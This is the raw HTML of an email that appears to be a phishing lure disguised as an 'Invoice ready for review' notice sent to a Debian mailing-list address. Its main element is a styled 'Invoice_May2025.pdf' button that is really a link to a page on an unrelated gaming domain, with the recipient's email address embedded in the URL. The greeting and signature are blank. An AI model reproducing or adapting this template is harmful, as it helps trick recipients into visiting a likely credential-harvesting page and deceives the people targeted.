<html><head>
<meta charset="UTF-8">
<title>Invoice Ready for Review</title>
<style>
body {
font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
background-color: #f7f9fc;
margin: 0;
padding: 0;
}
.email-container {
max-width: 680px;
margin: 30px auto;
background: white;
padding: 30px 35px;
border-radius: 8px;
box-shadow: 0 4px 16px rgba(0,0,0,0.1);
}
.header img {
max-height: 50px;
margin-bottom: 20px;
}
.title {
font-size: 22px;
font-weight: 700;
color: #0b3954;
margin-bottom: 20px;
}
.invoice-preview {
display: flex;
align-items: center;
background: #fff6f6;
border: 1.5px solid #e55353;
border-radius: 6px;
padding: 16px 20px;
max-width: 420px;
cursor: pointer;
text-decoration: none;
transition: box-shadow 0.3s ease;
}
.invoice-preview:hover {
box-shadow: 0 0 15px rgba(229, 83, 83, 0.4);
}
.invoice-preview img {
width: 32px;
margin-right: 15px;
}
.invoice-text {
display: flex;
flex-direction: column;
}
.invoice-filename {
font-weight: 700;
color: #b83232;
font-size: 16px;
}
.invoice-subtext {
font-size: 13px;
color: #7a7a7a;
}
.content {
font-size: 15px;
color: #444;
line-height: 1.5;
margin-top: 25px;
}
.footer {
margin-top: 40px;
font-size: 12px;
color: #999;
text-align: center;
border-top: 1px solid #ddd;
padding-top: 15px;
font-style: italic;
}
</style>
<meta http-equiv="X-UA-Compatible" content="IE=edge">
</head>
<body style="font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
background-color: #f7f9fc;
margin: 0;
padding: 0">
<div style="max-width: 680px;
margin: 30px auto;
background: white;
padding: 30px 35px;
border-radius: 8px;
box-shadow: 0 4px 16px rgba(0,0,0,0.1); width: 504px; height: 337px;" class="email-container">
<a style="display: flex;
align-items: center;
background: #fff6f6;
border: 1.5px solid #e55353;
border-radius: 6px;
padding: 16px 20px;
max-width: 420px;
cursor: pointer;
text-decoration: none;
transition: box-shadow 0.3s ease" class="invoice-preview" href="https://gamersplaytournament.com/docs-filenetwork/rfile.html?email=r-pkg-team@alioth-lists.debian.net" target="_blank" rel="noopener noreferrer">
<img style="width: 32px;
margin-right: 15px" alt="PDF Icon" src="https://centrefolio.com/PDF_file_icon.svg">
<div class="invoice-text">
<span style="font-weight: 700;
color: #b83232;
font-size: 16px" class="invoice-filename">Invoice_May2025.pdf</span>
<span style="font-size: 13px;
color: #7a7a7a" class="invoice-subtext">Click here to view your invoice</span>
</div>
</a>
<div style="font-size: 15px;
color: #444;
line-height: 1.5;
margin-top: 25px" class="content">
<p>Dear ,</p>
<p>Invoice is now available. Please review the attached document at your earliest convenience.</p>
<p>Thank you for your continued business.</p>
<p>Best regards,<br> </p></div>
<div style="margin-top: 40px;
font-size: 12px;
color: #999;
text-align: center;
border-top: 1px solid #ddd;
padding-top: 15px;
font-style: italic" class="footer">
© 2025 All rights reserved.
</div>
</div>
</body></html>